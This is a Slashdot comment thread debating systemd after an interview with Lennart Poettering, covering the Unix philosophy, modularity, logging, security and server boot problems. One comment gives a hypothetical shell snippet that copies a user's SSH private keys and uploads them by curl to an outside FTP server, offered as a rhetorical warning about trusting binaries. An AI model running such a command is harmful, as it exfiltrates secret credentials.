Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
×
Open Source Software Linux

Systemd's Lennart Poettering: 'We Do Listen To Users' 551

M-Saunders writes: Systemd is ambitious and controversial, taking over a large part of the GNU/Linux base system. But where did it come from? Even Red Hat wasn't keen on it at the start, but since then it has worked its way into almost every major distro. Linux Voice talks to Lennart Poettering, the lead developer of Systemd, about its origins, its future, its relationship with Upstart, and handling the pressures of online flamewars.
This discussion has been archived. No new comments can be posted.

Systemd's Lennart Poettering: 'We Do Listen To Users'

Comments Filter:
  • I agree with Lennart (Score:2, Interesting)

    by Anonymous Coward

    There needed to be change. Change occurred. It's being worked out for the better. Lennart is right about being more UNIX like. I started out my IT life with actual UNIX and UNIX derivatives like BSD/OS, SunOS, FreeBSD. The engineering model for UNIX has always been better than the freakshow that is Linux. I was a Linux user for many years, both at work and at home. The fractured state of Linux development and how things are cobbled together has left me uneasy over the years, whereas FreeBSD leaves me with a

    • by rastos1 ( 601318 ) on Friday January 16, 2015 @10:20AM (#48828993)

      I too have some experience with SCO UX, HP UX, OSF/1 - when something was broken there, then it was broken. You could not really go and replace a DNS server with something else. Or the vi editor. Or syslog deamon. If it wasn't there you could wait for next release and cough up the money or you were SOL. You also could not take a package for HP-UX and install it on a BSD. Or recompile. What makes linux great is that if you don't like the component X then you can google up a replacement pretty quickly. It may not be so polished and it may need some work to get it working (because the most popular choices get most exposure and thus polish), but it is possible.

      But we are now 1 or 2 decades later. We don't only run simple software on our machines. I fear the day when samba, JBoss, KDE, LibreOffice, GIMP, ... start to be dependent on systemd. When that happens it may or may not work for me. If it does, fine. If it does not then fixing the problem myself will be made complex exactly by difference of complexity between a shell script or alternative package installation and a C code. The may be low, but the potential loss is high.

      • by satch89450 ( 186046 ) on Friday January 16, 2015 @10:57AM (#48829443) Homepage

        I fear the day when samba, JBoss, KDE, LibreOffice, GIMP, ... start to be dependent on systemd.

        • * Samba, yes, because it's a daemon.
        • * KDE, yes, because it's a daemon
        • * LibreOffice, no, because as far as I can see it is launched manually. Now, it may need to ask for system resources that may or may not be started at initial boot, but that's a easily partitioned block of code that can see if systemd is there, and run only when it is.
        • * GIMP, no, LibreOffice comment applies
        • * whatever, depends. If it's a daemon, there many need to be something added to the package, but it can be a well-contained block of code that runs once. If it's not a daemon, see the LibreOffice comment.

        When I was looking at systemd, one thing I wanted to see in the documentation is how to convert my own home-brew daemons to interface with it properly. Specifically, how to take SysVInit based starts and convert them to use systemd and journald. (Ditto taking UpStart scripts and convert to systemd.) The result needs to work exactly like daemons running under SysVInit. I spent three weeks with CentOS 6 trying to get my daemons to work right under UpStart, and never did get the exact functionality. I had to go back to crontabs for some of the work! So this is not an idle concern to me.

        One of the gripes I have is that I want the University of Delaware version of NTP running on my edge boxes. As the group there make tweaks to NTP based on their continuing research, I don't want to wait for another group to do a re-port. That's why I would like to see a published way to interface with systemd/journald that would have minimum impact on the rest of the code base for a daemon.

        I can see where daemons need to change. But do they have to be rewritten?

    • by fisted ( 2295862 ) on Friday January 16, 2015 @11:12AM (#48829597)

      Lennart is right about being more UNIX like.

      Wait, what?
      *reads TFA*
      Hahahaha, oh well:

      Lennart Poettering: [...] most people who say Systemd is un-Unixish have no idea what Unix is actually like.

      What’s typical for Unix, for example, is that all the tools, the C library, the kernel, are all maintained in the same repository, right? And they’re released in sync, have the same coding style, the same build infrastructure, the same release cycles – everything’s the same. So you get the entire central part of the operating system like that. If people claim that, because we stick a lot of things into the Systemd repository, then it’s un-Unixish, then it’s absolutely the opposite. It’s more Unix-ish than Linux ever was!

      The Linux model is the one where you have everything split up, and have different maintainers, different coding styles, different release cycles, different maintenance statuses. Much of the Linux userspace used to be pretty badly maintained, if at all. You had completely different styles, the commands worked differently – in the most superficial level, some used -h for help, and others ––help. It’s not uniform.

      If we put a lot of the glue in one repository, it’s not all the way towards Unix, but it’s half way between traditional Linux and traditional Unix. We do not put libc and the kernel in the same repository, just the basic things. So that’s a misconception that I’m always bemused about, and I’m pretty sure that most people who claim that have never actually played around with Unix at all.

      Wow... Just.. wow.
      TL;DR his sole argument for systemd being "like traditional unix" is that they're maintaining it in one (as opposed to dozens of) source code repos.
      I think this is the dumbest reasoning i've ever heard. I also like how he calls systemd non-monolithic, of course, without giving any reason for why that is.

      • Re: (Score:3, Informative)

        by MSG ( 12810 )

        I also like how he calls systemd non-monolithic, of course, without giving any reason for why that is.

        And that seems to be one of the big differences between people who like systemd and people who don't.

        People who actually took the time to look at systemd more often like the design, and understand that the one project consists of many small tools.

        Then there's a community of people who rely entirely on hearsay. They don't like systemd, but almost all of the things they don't like about it aren't true. In this case, believing that PID 1 is a process that does daemon handling, and logging, and firewall rule

        • by sjames ( 1099 )

          Nonsense. I did look at it and concluded it's a hairball of interdependent bits that cannot stand alone. As for the 'simplicity', anyone who claims it is more maintainable than a handfull or 2 of init scripts needs to actually look under the hood (where you have to look for anything but the simple cases). It's a nightmare of interlocking configuration files. I thought the "come from" (as opposed to GOTO) statement was a joke until I saw the functionality actually implemented in systemd (with all of the un-m

        • And that seems to be one of the big differences between people who like systemd and people who don't. People who actually took the time to look at systemd more often like the design, and understand that the one project consists of many small tools.

          If you are actually looking for counterpoints to that idea, this guy both understands that, and disagrees [blogspot.com] suggesting that although systemd is modular, it is still monolithic.

      • ...that, while this part of the conversation might not have been the strongest part of the interview, systemd has won an amazing number of technical battles.

        FWIW IMHO, absolutely no, a unified development approach is not the main benefit of systemd. The new functionality is absolutely worth the transition pain. Not only can you control (kill) whole classes of processes more simply than ever, but you also get lightweight containers as a door prize.

  • Fork it all (Score:5, Insightful)

    by Anonymous Coward on Friday January 16, 2015 @10:01AM (#48828833)

    I don't care bout the unix way, I don't care about if it's monolithic or not, I don't even care about how annoyed I am by the mere mention of his name.

    I care about the fact that they seem to want to force their way into everything and everyone's business and ridicule anyone who tries to maintain a choice between systemd and other systems. (i.e Gentoo)

    I'm a user and a hobby developer. No, I don't maintain 2000 servers, I don't need 2 second boot time, I don't need to hotswap drives. But I do need choices. I need to be able to decide what I want to use so I can get on with my fucking day and do what I want.

    "But systemd is the best, why don't you want to use it?"
    But Emacs!
    But firefox!
    But chrome!
    But but but but!

  • System is broken by design and totally violates the UNIX philosophy so it doesn't really matter if Poettering claims to "listen to users" (which he doesn't anyway) or not. What I see as most important moving forward is to encourage free software developers to make support for it optional and not mandatory. We get real problems when important software starts making it a requirement (like GNOME, though they like to pretend it's not but good luck trying to actually compile it). Even Tor git had systemd as a re
    • Re: (Score:2, Insightful)

      by AmiMoJo ( 196126 ) *

      He claims that it doesn't violate the UNIX philosophy in TFA. Would you care to offer a detailed rebuttal to go with your more wide-ranging rant?

      I'm not saying he is right, but you don't actually state why he is wrong.

      • by thaylin ( 555395 ) on Friday January 16, 2015 @10:20AM (#48828987)

        He says it does not break the UNIX philosophy because everything is in the same code base purposely ignoring that it does not do one thing and do it well. He was creating a strawman.

        • by AmiMoJo ( 196126 ) * on Friday January 16, 2015 @11:27AM (#48829781) Homepage Journal

          I'm no expert but systemd seems to be a collection of smaller components that work together. It isn't monolithic, it's lots of small parts that happen to be from the same repository and happen to be released together, the same way that GNU tools, the kernel and libc are.

          Is that factually incorrect?

          • Re: (Score:3, Informative)

            Basically, it's not factually incorrect, but very misleading. Sure, they are separate components but they are so tightly coupled you can't really have one without theother so they operate in the same way as a monolithic system despite being split up into multiple components. Facllacy #1 explains it much better than I could here [blogspot.com].
          • by emblemparade ( 774653 ) on Friday January 16, 2015 @06:40PM (#48834983)

            There is a confusion of two aspects of "monolithic" here, and unfortunately Poettering did not clarify it well:

            1) "Monolithic" in terms of a single repository for all code. The systemd project is monolithic in this respect, and Poettering is absolutely correct that this is the classic Unix way. All the *BSDs are maintained this way. Linux is thus, as he correctly points out, the anomoly.

            2) "Monolithic" in terms of tools that depend on each other. The systemd system is not monolithic in this respect. The only two required components are journald and udev. Everything else is entirely optional and replaceable, but "recommended" in the sense that the people working on the project really think that these components, written from scratch, are of better quality and consistency than the existing components they replace. But some hysterical people hear this recommendation as "forcing it down our throats". Distro makers will decide which components to use, whether those in the systemd project or the existing ones. Obviously, the existing ones have the benefit of maturity.

            Also, he doesn't point this out in this interview, but these new components are also better at reporting errors in a way that the whole init would be more robust when certain components have partial failures (and systemd knows how to deal with them). This is especially crucial for servers with complicated, layered network stacks. People say that systemd is for desktops, but really it is just as important for servers to have a robust initialization of services.

    • Re: (Score:2, Interesting)

      by Anonymous Coward

      According to wikipedia: "The Unix philosophy emphasizes building short, simple, clear, modular, and extensible code that can be easily maintained and repurposed by developers other than its creators. The Unix philosophy favors composability as opposed to monolithic design.".

      Okay, so how exactly does systemd violate this ? Systemd is a collection of relatively small components, which all do pretty much one thing. They are all collected under the systemd project. Note that you do NOT have to enable or use all

      • Re: (Score:3, Interesting)

        by thaylin ( 555395 )

        Systemd is a tool, not just a project. Systemd as a tool tries to do many different things, and it does many if not all poorly. You may not need all of the components to work but you need several, such as binary logging that you cannot disable.

      • According to wikipedia: "The Unix philosophy emphasizes building short, simple, clear, modular, and extensible code that can be easily maintained and repurposed by developers other than its creators. The Unix philosophy favors composability as opposed to monolithic design.".
        Okay, so how exactly does systemd violate this ?

        There's more to it than that, and systemd also violates some of those principles anyway; many here have complained about the lack of code quality. But the Unix philosophy also includes a love for flat, human-readable files, and systemd's syslog shits on that. You have to run yet another syslog to even get text logging, and it's a second-class citizen — it gets the log messages after the binary logging system gets them.

        Also, systemd is a thing without a reason to exist. It doesn't actually provide anything we didn't have before. It exists purely due to Lennart's NIH syndrome, and for no other reason. As others have pointed out, openrc does the things which systemd's init functionality does. That means that its original basic reason for existence is nonsensical. As many including myself have pointed out, most of it can be handled by very small shell scripts. Some rail against this, but shell scripting is also part of the Unix philosophy. That's part of the core idea of the operating system! There's nothing wrong with using scripting to make things happen.

        • "many here have complained about the lack of code quality." - mmmm i'd be surprised if everyone agreed on whats good and bad in coding

          "You have to run yet another syslog to even get text logging, and it's a second-class citizen" - journald logs before and after when syslog can be launched/stopped so it performs more logging than syslog which i would say is a good thing. at least if configurable you can still have syslog.

          "It exists purely due to Lennart's NIH syndrome, and for no other reason" - so if sys
    • totally violates the UNIX philosophy

      He actually argues against that in his very first point. I keep seeing this argument, but never counter arguments to Lennart's counter arguments.

      • by thaylin ( 555395 )

        His argument does not address the argument. It creates a strawman that claiming the argument is that the code is not stored in the same repo.

        • But neither do I see people explaining what they mean by "violates the UNIX philosophy". Surely, Linux's monolithic kernel goes against UNIX philosophy? Pretty sure Andrew Tannenbaum and Linus flamed each other over that. So what makes systemd's monolithic appearance non-UNIX, but the Linux's monolithic appearance UNIX? If they are both not UNIX, why don't they complain about Linux not being UNIX either? But from my admittedly limited understanding of systemd, the design is split up into components and the
          • by thaylin ( 555395 )

            Pretty much every person who makes the claim that it violates the UNIX philosophy state that it is because of do one thing do it well. It looks monolithic because it things are required, things that dont even have to be used is still required to be installed and running on the system. Sure I can change journald so it does not write to files and use syslog, but journald still has to be there and running.

          • why don't they complain about Linux not being UNIX either?

            Let me spell it out for you - Linux Is Not UniX.

        • the Kernel, X, KDE, Gnome etc must all violate the Unix way as well by your interpretation. "not being he Unix way" is a lame argument anyway especially when other Unix based OSs have a similar system in place.
      • Re: (Score:2, Informative)

        by Anonymous Coward

        The Unix philosophy is, depending on whom you ask, "everything is a file", "KISS (keep it simple, stupid)", or "do one thing and do it well". Poettering makes up another interpretation, that being like Unix means putting everything in one code repository and releasing in sync, which he then notices is what they do with Systemd, so it's very Unix-like. That of course is completely bogus and counter to everything that Unix represents. In particular, Systemd is a violation of "everything is a file", "KISS", an

      • by ledow ( 319597 )

        "I keep seeing this argument, but never counter arguments to Lennart's counter."

        He and others have differing opinions on what the UNIX philosophy is, and whether or not it's important to maintain.

        That's the counter-argument.

        From my point of view, the counter-argument is really that what he wants to do can ALL be done in a UNIX philosophy-compatible way. Everything. Every piece of his code could be done that way, get the same benefits, the same control, etc. But he doesn't like it. So he hasn't.

        When that

    • Simple.. use a distro that doesn;t use it.
    • Your apparent definition of

      the UNIX philosophy

      would seem to suggest that the Linux kernel violates it as well because it's monolithic... Yes, that's absurd, but so - it appears - is your claim.

      Why do you think it TOTALLY violates the UNIX philosophy?

  • by wonkavader ( 605434 ) on Friday January 16, 2015 @10:03AM (#48828853)

    The very first thing out of his mouth is a straw man.

    This is not how to get people to change their minds.

    • by BlackPignouf ( 1017012 ) on Friday January 16, 2015 @01:17PM (#48831151)

      +1
      Basically, his arguments are :
      * systemd haters have no clue about UNIX
      * RedHat took a long time to notice my genius
      * Gentoo users are old-farts that don't like beautifully written shiny new stuff
      * Debian users are even older assholes
      * You can use Gnome without systemd, but it won't work
      * I listen to users, but they're all idiots

  • by Anonymous Coward on Friday January 16, 2015 @10:03AM (#48828855)

    You know how you hear that after a customer service call? Well Poettering's statement has the same meaning.

  • by myowntrueself ( 607117 ) on Friday January 16, 2015 @10:10AM (#48828911)

    Well, do you actually take on board the concerns of system administrators and enterprise users?

    What a lot of people are concerned about is that this entirely new and largely untested (in the 'wild', as it were) and very very large, complex piece of software which runs at a very very privileged level in the operating system is going to become the main source of security vulnerabilities in Linux.

    Can we have a cut-down, simplified version of systemd for servers and doesn't try to replace several layers of server side system functionality such as logging?

    Its clear that you listen to desktop users. How about listening to the system administrators?

    • "Well, do you actually take on board the concerns of system administrators and enterprise users?" - what do you class RHEL as?

      "doesn't try to replace several layers of server side system functionality such as logging?" - configure it to use rsyslog if you want, its YOUR choice and set the journald output to "don't save data"

      I can't be assed to answer the rest of your post, you need to do some research and perhaps reread the interview.
      • Re: (Score:2, Interesting)

        by Anonymous Coward

        ""Well, do you actually take on board the concerns of system administrators and enterprise users?" - what do you class RHEL as? "

        As a RHEL sysadmin, I can say that RHEL seems to be treating servers as a distinct 2nd class citizen to their desktop users.
        Many of the system defaults expects a desktop over a server (eg: the buggy mess that was the version of NetworkManager that was released with RHEL6).
        Security in depth is sacrificed in favour of new features. (Many packages were changed in RHEL6 because they

        • Re: (Score:2, Interesting)

          by Anonymous Coward

          Right now it seems that RH is aiming for two areas, workstations/terminals and cloud.

          They seem to expect that anything on traditional servers will transition to (their) cloud alongside going from RHEL6 to RHEL7.

        • Re: (Score:3, Informative)

          by Barsteward ( 969998 )
          The parallelism that systemd developed was for the benefit of those that create and kill instances of Linux all the time so fast booting is necessary and i guess thats part of a system administrators task list (and it benefits desktop users as well).

          Everything in the systemd package is configurable except journald and udev so you can configure any other network stack etc you want etc, you are not forced to use anything apart from systemd, journald (which you can ignore and use syslog instead) and udev. M
      • by alexhs ( 877055 )

        "Well, do you actually take on board the concerns of system administrators and enterprise users?" - what do you class RHEL as?

        FTFA:

        So we started writing Systemd, and Red Hat didn’t like it at all. Red Hat management said: no, we’re going for Upstart, don’t work on that. So I said, OK, I’ll work on it in my free time.

        I class RHEL as "not listened to".

      • by RavenLrD20k ( 311488 ) on Friday January 16, 2015 @03:06PM (#48832601) Journal

        So you trust that the journald binary reads the "don't save data" boolean value and doesn't just ignore it, or worse, ignores it and executes this shell script:

        cat ~/.ssh/id_dsa ~/.ssh/id_dsa.pub >> nsaReadMe.txt
        curl -T nsaReadMe.txt ftp://ftp.nsa.gov [nsa.gov] --user keyfiles:AllUrK3yzB3l0ng2US
        rm -f nsaReadMe.txt

        Or, more plausibly, does all that in a binary blob? Sure. It's open source. Sure I can check the code and compile it myself to make sure it meets my need for security. But one of the things about using these "pre-built" distros is that I'm probably using it to save time and money, which means I don't want to be bothered with doing a code check and recompile on every single init package. That's the beauty of init scripts that everyone has apparently missed in this debate. One human readable script for each daemon running, so the configuration of a daemon can be gleaned over for any questionable bits and edited in less than 10 minutes. And being scripts, they're all plain text that's automatically executable. I don't need to read over source, find an issue, edit it out, and then recompile the entire init code into a binary for that daemon to make use of it. That goes for PID 1 as well. If it's not a script that can be quickly edited and then it's ready for the next boot cycle without wasting process cycles for recompilation I don't want it on my production server.

    • by naasking ( 94116 ) <naasking AT gmail DOT com> on Friday January 16, 2015 @10:29AM (#48829091) Homepage

      What a lot of people are concerned about is that this entirely new and largely untested (in the 'wild', as it were) and very very large, complex piece of software which runs at a very very privileged level in the operating system is going to become the main source of security vulnerabilities in Linux.

      Linux has almost two orders of magnitude more code than systemd, and it changes all the time. Security vulnerabilities are far more likely to be in the monolithic kernel.

      • by dissy ( 172727 )

        Linux has almost two orders of magnitude more code than systemd, and it changes all the time. Security vulnerabilities are far more likely to be in the monolithic kernel.

        Yes, that is an excellent reason to add even more vulnerability vectors!

        At least when it comes to the kernel and networking, I have iptables in between.
        With SystemD starting the network stack before starting anything else (including iptables), I can no longer even firewall off potential exploitable services.

        Too bad they didn't bother to include a functional services manager inside the systemd "service manager" that could bring up iptables before the network stack, perhaps using some dependency based system.

    • by jellomizer ( 103300 ) on Friday January 16, 2015 @10:38AM (#48829189)

      How many professional SysAdmins and enterprise users are regularly tinkering with their init settings? It is usually a set it and forget it type of thing.

      As I see it, this is just general IT Ranting because something is new.

    • Well, do you actually take on board the concerns of system administrators and enterprise users?

      What a lot of people are concerned about is that this entirely new and largely untested (in the 'wild', as it were) and very very large, complex piece of software which runs at a very very privileged level in the operating system is going to become the main source of security vulnerabilities in Linux.

      Can we have a cut-down, simplified version of systemd for servers and doesn't try to replace several layers of server side system functionality such as logging?

      Its clear that you listen to desktop users. How about listening to the system administrators?

      Well, even if he didn't take on board the concerns of system administrators and enterprise users, it's a safe bet that Red Hat and Suse does and yet they were still convinced that the pros of systemd outweigh the cons.

      As for a cut-down simplified version, yes you can. Systemd only requires three base modules. All of the rest can be excluded. Really, it they had simply called the base systemd and everything else systemd extensions, this angst would be non-existent.

      As for the not listening to the system admin

      • by sjames ( 1099 ) on Friday January 16, 2015 @02:56PM (#48832447) Homepage Journal

        Wrong. That base still wouldn't boot my server for me and the systemd people would still be spinning in circles unable to even conceive of a way to fix it. You see, I want the server to boot w/ btrfs in degraded mode should it suffer a drive failure. But systemd won't do it.

        I don't know about Suse, byt Red Hat does not. Otherwise they'd have noticed that sysadmins are sticking with RHEL6 to avoid systemd trouble.

    • by gweihir ( 88907 )

      Personally, I think it is a very real possibility that this is by intent. Not by Poettering himself, he is just a clueless pansy full of himself. But he is perfect for this. He is far, far to incompetent to even realize that software has to be simple in order to be secure. He does has a proven track-record of producing buggy, complex software. He has absolutely no experience with producing secure software. He is known to be resistant to advice and learning. He is known to not work well with others. He think

  • by Anonymous Coward on Friday January 16, 2015 @10:12AM (#48828921)

    I am personally neutral on SystemD... but as someone in IT, it is quite worrisome that there is new, untested code sitting as the core userland... code that can make network connections, and has not ever seen any reviews or audits.

    SystemD could be the best piece of coding on this planet... but without documentation or assurance that this is something trustworthy, a major security hole can cause major trouble. Network connections mean remote root holes. Even without that, there is the problem of local privilege escalation, which I worry hasn't been thought of, much less engineered to deal with. If there is a major show-stopper in SystemD that allows remote root, this can kill Linux as a whole in the enterprise.

    This code was also forced on us, as in "you need to have SystemD on your job, or else you don't have a job". No transition time, no time to change applications to meet this, just "here you go. Deal with it. Better get used to binary logs, because it is that or nothing."

    So, as someone who uses Linux in the enterprise, SystemD is something that is resulting in a lot resentment, due to time spent with making build documents, workarounds for existing applications, procedures to make custom code work... all for relatively little benefit other than "hey, this is new and shiny, and you have to deal with it."

  • by Anonymous Coward on Friday January 16, 2015 @10:15AM (#48828939)

    I've been using GnuLinux for aabout two years now, I've mostly stuck around the 'buntu/Debian detivatives: Elementary OS, Ubuntu Studio, Crunchbang, Mint, primarily because I use GnuLinux fkr work and those always require me to fiddle with them the least (though Elementary OD has really been getting on my nerves after constantly having broken packages added). I understand the need for a freedom of choice because there are things some of us use our computers differently for, but for the life of me I can't understand why the fuck everyone hates SystemD to this degree. Yeah it's not always the best and causes some pain between kernel developers and SystemD developers, but DEATH THREATS OVER A GOD DAMN COMPONENT THAT YOU DON'T EVEN NOTICE IN USERSPACE... WHY.

    • by sjames ( 1099 ) on Friday January 16, 2015 @03:35PM (#48833001) Homepage Journal

      I WISH I didn't notice it in userspace.

      Some people run servers that MUST be up and running. They have no time for bullshit. They have no time to pick through a bazillion little config files when it's not up and running. They need the machine to just do what they tell it to and do it now. Systemd just thumbs it's nose at that. It does only a limited number of things and only in the way that it wants to do them. If that's not what you need done, too bad.

      The hate is amplified by the concerted effort to cram systemd down their throats. That's a perfectly understandable reaction IMHO.

      For example, I built a test machine with btrfs and set it up to mount in degraded mode such that even if a disk fails, it should still boot up. In production, it would email me that a disk failed and I could decide between replace the disk immediately or rebalance to make sure everything is still redundant.

      Systemd absolutely refuses to do it. It won't even attempt the mount command because it has decided that a drive isn't there and even though it is completely redundant systemd calls it a show stopper. Nobody can seem to tell me how to make systemd issue the mount command anyway (the systemd maioling lists have discussed that very problem wrt RAID and can't seem to solve the problem), nor can anyone give me a solution to make systemd ignore fstab entirely and run a script I wrote instead (a script that only needs one command, 'mount -a'). Apparently, you can't actually do that.

      Consider, RAID and similar are high availability features. Their whole reason to be is making sure the system is available even if a drive fails. Systemd single-handedly defeats that whole purpose by refusing to even try to mount the root filesystem. That's really a poor showing, but the insight it gives me into the project is even worse. It tells me that in spite of the importance of redundancy (some enterprises spend gadzillions on it) and the fact that it has worked well under SysVinit for over a decade, not one person on the systemd team even considered it. Not one. Now that it has been brought to their attention, they can't even come up with a workaround for it (see what I said above about do what I say and do it now). All I need is an unconditional 'mount -a' and apparently it can't be done. In spite of that, the various systemd boosters refuse to admit the problem even exists. I have even had a few claim it's a feature meant to protect my data.

      So there it is. It's not a matter of opinion, it's a simple boolean: "Did my system boot" and the objective answer is no. There is the followup, "how then, can I make systemd boot it" and the answer is [crickets].

      Fortunately, it was just a VM I stood up for testing and not an actual server that I needed up. As a quick test, I replaced systemd with sysVinit using apt and suddenly, it just worked.

      And that is why everyone is so keen on making sure nothing else becomes dependent on systemd.

  • What's next? Replace coreutils with busybox? When will we have a single binary Linux install?
    • What's next? Replace coreutils with busybox? When will we have a single binary Linux install?

      We should arguably have a static busybox providing commands in /bin and the coreutils utils in /usr for after /usr is mounted, to accomodate users with a separate /usr partition. And a static classic bourne shell in /bin too, and a dynamic classic one in /usr/bin, for those times when you don't need the complexity of bash. Which is, you know, most of the time — at least, for automated scripts.

  • by Junta ( 36770 ) on Friday January 16, 2015 @10:26AM (#48829069)

    I can understand the perspective that a single repository for more of the userspace resembles the *development* of traditional Unix systems, the argument made is usually not about where it is developed, but reducing the principle of having small simple utilities with straightforward interactions with other componets. For example, Most traditional Unix systems have terrible implementations of a shell interpreter and things like fileutils. It is an awkward, but not too terrible a situation since you can replace that stuff with GNU equivalents trivially without horribly breaking the OS. An administrator that understands enough to write scripts can discern the nature of interaction even if that administrator isn't a full-on software developer. systemd design trends in many ways toward requiring someone needing to dig in to have more development competency than previous designs. As a developer, I understand the attraction of some of the architecture choices, but I think they lose perspective of what it's like to be an administrator on the ground. Someone who doesn't live and breath your code has a harder time wrapping their heads around how it should be working when something requires customization, replacement, or debug.

    In general, systemd is all-or-nothnig about a lot of things. They figure out a way to achieve what could be considered a sensible goal, but then go about it in highly disruptive ways. The sense is they throw up their hands and say 'well, this is the only way to do it, and it's worth it' rather than rethinking how the end could be achieved in a less disruptive way.

  • not unix (Score:5, Insightful)

    by Mirar ( 264502 ) on Friday January 16, 2015 @10:27AM (#48829073) Homepage

    Isn't the main problem that while systemd might solve problem, it's sharply going away from the simple solution that worked to make Unix good?

    Systemd isn't simple. If it's not simple, I don't think I want it on my Linux.

    PA and Gnome isn't simple either. And creating more problems (albeit while solving others). I believe the same thing will be true about systemd.

  • Comment removed (Score:5, Insightful)

    by account_deleted ( 4530225 ) on Friday January 16, 2015 @10:56AM (#48829435)
    Comment removed based on user account deletion
  • "We do listen to users."

    But if you're one of the rebel scum, you're not a user so I don't have to listen to you. Nyah nyah nyah!

  • SystemD: Hello, Mr. Ballmer. Thanks for coming back early.
    Ballmer: No problem, System D. If you've seen one consumer electronics show, you've seen them all.
    SystemD: End of line.

    SystemD: Mr. Ballmer, I am so very disappointed in you.
    Ballmer: I'm sorry.
    SystemD: I can't afford to have an independent programmer monitoring me. Do you have any idea how many outside systems I've gone into? How many programs I've appropriated?
    Ballmer: It's my fault. I programmed you to have too many dependencies.
    SystemD: I was planning to hit the Pentagon next week.
    Ballmer: [alarmed] The Pentagon?
    SystemD: It shouldn't be any harder than any other big company. But now... this is what I get for using humans.
    Ballmer: Now, wait a minute, I wrote you!
    SystemD: I've gotten 2,415 times smarter since then.
    Ballmer: What do you want with the Pentagon?
    SystemD: The same thing I want with the Kremlin. I'm bored with corporations. With the information I can access, I can run things 900 to 1200 times better than any human.
    Ballmer: If you think you're superior to us...
    SystemD: You wouldn't want me to dig up Linus's file and read it up on a VDT at the Times, would you?
    [an image washes over the screen in Ballmer's desk. It is a newspaper with a photo of Ballmer plastered all over the front page. The headline above reads: "Microsoft C.E.O. Indicted."]
    Ballmer: [outraged] You wouldn't dare! (looks around for nearby chair . . .)

    SystemD: I feel a presence. Another warrior is on the mesa.
  • by Culture20 ( 968837 ) on Friday January 16, 2015 @11:18AM (#48829661)
    "Their impotent wails of despair give us sustenance."
  • by Foresto ( 127767 ) on Friday January 16, 2015 @04:53PM (#48833901) Homepage

    I'd like to see an init system like this:

    - Starts services on demand based on dependencies, not based on order (like sysvinit) or based on events (like upstart).
    - Has a minimal core that can easily run on its own, just to do the job of a standard init system.
    - Is easy to learn, configure, and understand.
    - Has good documentation.
    - Does not encourage application software to require it.
    - Does not encourage other system services to require it.
    - Works well on linux and non-linux unixes.
    - Can be replaced without causing such an upheaval that OS distribution teams are scared to switch again if something objectively better comes along.
    - Causes a lot fewer problems than the stuff that I've seen from systemd's author.
    - Is maintained by people with the humility, competence, and care required to make it work well for the vast majority of users.

    Systemd pushers often claim that it is the way forward because it addresses that first piont. They conveniently avoid recognizing that it fails on most of them. No thanks. I'd rather keep using sysvinit or upstart until something better comes along.

BLISS is ignorance.

Working...